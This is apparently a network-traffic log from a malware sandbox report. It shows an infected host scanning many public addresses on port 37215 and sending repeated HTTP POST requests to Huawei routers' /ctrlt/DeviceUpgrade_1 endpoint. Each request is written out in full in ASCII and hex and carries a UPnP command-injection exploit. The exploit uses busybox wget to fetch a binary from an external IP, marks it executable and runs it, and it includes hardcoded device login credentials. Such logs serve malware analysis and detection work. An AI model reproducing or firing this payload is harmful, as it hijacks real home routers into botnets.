                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1405192.168.2.1533038181.59.100.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400005102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1406192.168.2.1549182186.249.242.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400024891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1407192.168.2.1548844190.81.239.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400048971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1408192.168.2.1547690181.7.233.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400059938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1409192.168.2.154720894.78.145.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400080919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1410192.168.2.154073841.218.11.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400120020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1411192.168.2.1534368164.12.131.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400120974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1412192.168.2.1553608190.236.88.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400141001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1413192.168.2.1548840185.119.130.12537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400154114 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1414192.168.2.1551664157.3.173.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400181055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1415192.168.2.1539404186.104.179.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.400196075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
